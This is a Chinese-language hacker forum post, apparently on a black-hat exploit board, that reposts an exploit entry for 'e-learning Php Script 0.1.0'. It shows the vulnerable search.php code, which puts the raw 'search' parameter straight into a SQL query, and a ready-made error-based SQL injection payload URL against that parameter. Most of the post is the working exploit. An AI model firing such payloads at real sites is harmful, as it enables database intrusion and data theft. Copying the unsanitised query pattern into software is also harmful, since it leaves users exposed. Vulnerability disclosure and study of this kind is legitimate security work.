跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

e-learning Php Script 0.1.0 - 'search' SQL Injection

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: e-learning Php Script 0.1.0 - 'search' SQL Injection
# Date: 2020-06-29
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage: https://github.com/amitkolloldey/elearning-script
# Software Link: https://github.com/amitkolloldey/elearning-script
# Version: 0.1.0
# Tested on: Kali Linux

Source code(search.php):
                     <?php
                     if(isset($_GET['search_submit'])){
                     $search_key = $_GET['search'];
                     $search = "select * from posts where post_keywords 
like '%$search_key%'";
                     $run_search = mysqli_query($con,$search);
                     $count = mysqli_num_rows($run_search);
                     if($count == 0){
                     echo "<h2>No Result Found.Please Try With Another 
Keywords.</h2>";
                     }else{
                     while($search_row = 
mysqli_fetch_array($run_search)):
                     $post_id = $search_row ['post_id'];
                     $post_title = $search_row ['post_title'];
                     $post_date = $search_row ['post_date'];
                     $post_author = $search_row ['post_author'];
                     $post_featured_image = $search_row ['post_image'];
                     $post_keywords = $search_row ['post_keywords'];
                     $post_content = substr($search_row 
['post_content'],0,200);
                     ?>

Payload:
         http://127.0.0.1/e/search.php?search=a&search_submit=Search
         http://127.0.0.1/e/search.php?search=a'OR (SELECT 3475 
FROM(SELECT COUNT(*),CONCAT(0x716b787171,(SELECT 
(ELT(3475=3475,1))),0x7171787871,FLOOR(RAND(0)*2))x FROM 
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IsDG&search_submit=Search

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。